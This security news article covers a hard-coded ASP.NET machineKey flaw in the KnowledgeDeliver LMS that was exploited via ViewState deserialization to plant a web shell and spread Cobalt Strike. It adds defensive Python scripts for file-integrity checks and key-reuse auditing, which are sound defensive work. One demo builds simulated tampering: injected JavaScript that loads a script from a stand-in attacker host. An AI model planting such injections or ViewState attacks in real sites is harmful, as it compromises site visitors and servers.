A recently patched high-severity vulnerability in the widely used Japanese Learning Management System (LMS) platform, Digital Knowledge KnowledgeDeliver, has been actively exploited by threat actors as a zero-day attack. Security researchers revealed that attackers used the flaw to deploy the notorious Godzilla web shell and later install Cobalt Strike Beacon malware on compromised systems.
Vulnerability Details
The flaw, tracked as CVE-2026-5426, carries a CVSS score of 7.5 and affects KnowledgeDeliver deployments released before February 24, 2026.
According to researchers from Google Mandiant and Google Threat Intelligence Group, the issue originated from hard-coded ASP.NET machine keys embedded within the platform’s configuration files. These machine keys are responsible for encrypting and signing ViewState data in ASP.NET applications.
Because the same machine keys were reused across multiple deployments, attackers who obtained the keys from one installation could exploit other internet-facing instances of the LMS platform.
How the Attack Worked
The attack relied on a ViewState deserialization technique. In ASP.NET applications, ViewState preserves page data between requests. However, when attackers know the machineKey values, they can craft malicious ViewState payloads and send them through the __VIEWSTATE parameter in HTTP requests.
Because the server accepts a ViewState signed with the known machine key as trustworthy, it deserializes the payload, giving the attacker remote code execution without authentication.
Security researchers observed attackers exploiting the flaw to deploy the Godzilla web shell, also known as BLUEBEAM. This gave the attackers persistent access to compromised servers and enabled them to execute commands remotely or upload additional malicious payloads.
Attackers Modified LMS Files
After gaining access, the threat actors escalated their control over the server by changing file system permissions. Specifically, they granted “Everyone” full access to the LMS web application directory.
The attackers also tampered with a JavaScript file used by the application. The malicious modification displayed a fake security alert to users, urging them to install what appeared to be a “security authentication plugin.”
Behind the scenes, the altered JavaScript silently loaded a malicious script hosted on an attacker-controlled domain. Victims who downloaded the fake installer were ultimately infected with Cobalt Strike Beacon malware.
Researchers noted that the malware payload was encrypted using a key tied to the name of the compromised organization, suggesting that the campaign specifically targeted selected victims rather than conducting broad automated attacks.
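The tampering described above (a modified application JavaScript file that pulls a script from an attacker-controlled domain, plus additional files dropped into the web directory) is the kind of change a file-integrity baseline catches. The following is an added example written for this page, not code from the researchers or from the KnowledgeDeliver vendor: it records SHA-256 hashes of every file under a web application directory, reports files that were modified, added or removed since the baseline, and lists external hostnames referenced by a changed JavaScript file that are not on an allowlist. The directory layout, file contents and the `plugin-update.example` hostname are constructed for the demonstration.

```python
import hashlib
import re
import tempfile
from pathlib import Path


def hash_file(path):
    """SHA-256 of a file's contents, read in chunks."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_baseline(root):
    """Map of relative path -> SHA-256 for every regular file under root.
    Paths are normalised to forward slashes so a baseline taken on Windows
    compares cleanly with one taken elsewhere."""
    root = Path(root)
    return {
        str(p.relative_to(root)).replace("\\", "/"): hash_file(p)
        for p in root.rglob("*")
        if p.is_file()
    }


def diff_against_baseline(root, baseline):
    """Compare the directory's current state with a stored baseline."""
    current = build_baseline(root)
    return {
        "modified": sorted(k for k in current if k in baseline and current[k] != baseline[k]),
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
    }


# Hostname portion of any http(s) URL embedded in a script.
EXTERNAL_URL = re.compile(r"https?://([A-Za-z0-9.-]+)")


def foreign_hosts(path, allowed_hosts):
    """Hostnames referenced by a (changed) script that are not on the allowlist.
    A freshly introduced external host in application JavaScript is the
    pattern described in the article and deserves a manual look."""
    text = Path(path).read_text(errors="ignore")
    return sorted({h.lower() for h in EXTERNAL_URL.findall(text)} - set(allowed_hosts))


def demo():
    """Constructed scenario: take a baseline, simulate tampering, report."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "Scripts").mkdir()
        app_js = root / "Scripts" / "app.js"
        app_js.write_text('console.log("lms ready");\n')
        baseline = build_baseline(root)  # taken while the deployment is known-good

        # Simulated tampering (constructed): the script now loads an external
        # file from a hostname the deployment never referenced before, and an
        # unexpected file appears in the web directory.
        app_js.write_text(
            app_js.read_text()
            + 'var s = document.createElement("script");\n'
            + 's.src = "https://plugin-update.example/auth.js";\n'
            + "document.head.appendChild(s);\n"
        )
        (root / "Scripts" / "added.aspx").write_text("<!-- constructed placeholder file -->\n")

        report = diff_against_baseline(root, baseline)
        hosts = foreign_hosts(app_js, allowed_hosts={"lms.example"})
        return report, hosts


if __name__ == "__main__":
    changes, suspicious_hosts = demo()
    print("changes:", changes)
    print("unexpected external hosts in changed JS:", suspicious_hosts)
```

In practice the baseline would be stored off-host (an attacker with write access to the web directory can edit a baseline kept beside it), and the comparison scheduled to run after every deployment and on a fixed interval; the allowlist holds the hostnames the application legitimately loads scripts from.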
Similar Attacks Observed Elsewhere
The exploitation of KnowledgeDeliver follows a growing trend involving exposed ASP.NET machine keys. Similar security issues have previously impacted platforms such as:
- Sitecore Experience Manager
- Gladinet CentreStack
- Gladinet TrioFox
Microsoft had earlier warned about threat actors abusing publicly disclosed ASP.NET machine keys in February 2025.
Why This Matters
This incident highlights the dangers of using shared secrets across software deployments. When vendors distribute identical cryptographic keys in deployment templates, a single leak can place every customer installation at risk.
Cybersecurity experts recommend organizations:
- Rotate and generate unique machine keys for every deployment
- Apply security patches immediately
- Monitor endpoints for suspicious activity
- Restrict unnecessary file permissions
- Implement stronger detection for deserialization attacks
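The root cause described earlier (one vendor-shipped machineKey pair reused across many installations) and the first recommendation above (unique keys per deployment) can both be checked and acted on with a small audit script. What follows is an added example written for this page, not code from the researchers or from the KnowledgeDeliver vendor: it parses the `<machineKey>` element from several web.config files, fingerprints each key pair to find pairs shared between deployments, and generates replacement values of the lengths ASP.NET expects for HMACSHA256 validation and AES decryption. The deployment names and key values are constructed placeholders, not real keys.

```python
import hashlib
import re
import secrets
import xml.etree.ElementTree as ET
from collections import defaultdict

# Constructed sample web.config fragments for three hypothetical deployments.
# "campus-a" and "campus-b" still carry the same key pair from the deployment
# template; "campus-c" has already been rekeyed with deployment-specific values.
SHARED_VALIDATION = "A" * 128  # placeholder, not a real key
SHARED_DECRYPTION = "B" * 64   # placeholder, not a real key


def _web_config(validation, decryption):
    return f"""<?xml version="1.0"?>
<configuration>
  <system.web>
    <machineKey validationKey="{validation}"
                decryptionKey="{decryption}"
                validation="HMACSHA256" decryption="AES" />
  </system.web>
</configuration>"""


SAMPLE_CONFIGS = {
    "campus-a": _web_config(SHARED_VALIDATION, SHARED_DECRYPTION),
    "campus-b": _web_config(SHARED_VALIDATION, SHARED_DECRYPTION),
    "campus-c": _web_config("C" * 128, "D" * 64),
}


def extract_machine_key(web_config_xml):
    """Return (validationKey, decryptionKey) from a web.config string, or None
    when no explicit <machineKey> is present or the keys are auto-generated
    (the 'AutoGenerate' setting makes ASP.NET derive per-host keys itself)."""
    root = ET.fromstring(web_config_xml)
    node = next(root.iter("machineKey"), None)
    if node is None:
        return None
    validation = node.get("validationKey", "")
    decryption = node.get("decryptionKey", "")
    if validation.startswith("AutoGenerate") or decryption.startswith("AutoGenerate"):
        return None
    return validation, decryption


def key_fingerprint(pair):
    """Short hash of a key pair so reports never echo the key material."""
    return hashlib.sha256("|".join(pair).encode()).hexdigest()[:16]


def find_shared_keys(configs):
    """Group deployments by key-pair fingerprint. Any group with more than
    one member means a key leak from one install exposes the others."""
    groups = defaultdict(list)
    for name, xml in configs.items():
        pair = extract_machine_key(xml)
        if pair is None:
            continue
        groups[key_fingerprint(pair)].append(name)
    return {fp: sorted(names) for fp, names in groups.items() if len(names) > 1}


def generate_machine_key_element():
    """Fresh, deployment-unique keys from the OS CSPRNG: 64 random bytes for
    the HMACSHA256 validation key and 32 random bytes for the AES-256
    decryption key, emitted as a <machineKey> element for web.config."""
    validation = secrets.token_hex(64).upper()
    decryption = secrets.token_hex(32).upper()
    return (
        f'<machineKey validationKey="{validation}" decryptionKey="{decryption}" '
        'validation="HMACSHA256" decryption="AES" />'
    )


if __name__ == "__main__":
    for fp, names in find_shared_keys(SAMPLE_CONFIGS).items():
        print(f"key pair {fp} is shared by: {', '.join(names)}")
    print("replacement element for one deployment:")
    print(generate_machine_key_element())
```

Run against the real web.config of each deployment you operate, the script reports which installations share a key pair without printing the keys themselves. Each flagged deployment gets its own freshly generated element, and existing sessions will be invalidated when the key changes, so schedule the rotation accordingly.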
Organizations running older versions of KnowledgeDeliver are strongly advised to update their systems and review logs for signs of compromise.
